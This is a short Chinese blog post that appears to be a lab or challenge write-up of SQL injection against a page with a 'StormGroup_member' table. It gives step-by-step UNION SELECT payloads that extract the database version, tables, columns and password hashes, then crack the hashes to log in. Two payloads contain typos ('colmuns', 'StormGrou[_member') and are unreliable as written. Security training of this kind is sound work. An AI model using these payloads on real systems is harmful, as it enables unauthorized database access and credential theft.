本文详细介绍了如何通过流程判断注入点,从页面源码分析到利用SQL注入技术逐步探索数据库结构,包括版本、表、字段和数据。重点讲解了使用UNION查询进行深度探测的方法,并揭示了应对不同位置的输入验证策略。
掌握流程,判断注入点,找数据库版本和数据库,然后表,然后字段,然后数据
右键查看源码,发现看上去能注入的页面
用 and 1=1 和 and 1=2发现注入点
然后用order by去找这个查询语句查多少个字段一直试到5发现没有页面反弹,说明只有4个
然后再用union查询
注意 id=-1 这样就回弹就显示后面不显示前面的
发现只有23回弹,说明我们一会测试值也要防2,3位置
先看数据库版本和数据库
union select 1,version(),database(),4
然后查表
union select 1,table_name,3,4 from information_schema.tables where table_schema='数据库名'
查字段
union select 1,group_concat(column_name),3,4 from information_schema.colmuns where table_name='表名'
然后查数据咯
union select 1,name,password,4 from StormGroup_member
然后md5解密完,去试发现登入失败,那就说明还要其他name和password是可以登入的
union select 1,name,password,4 from StormGrou[_member limit 1,1
解MD5然后登入发现key
扫一扫
359
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
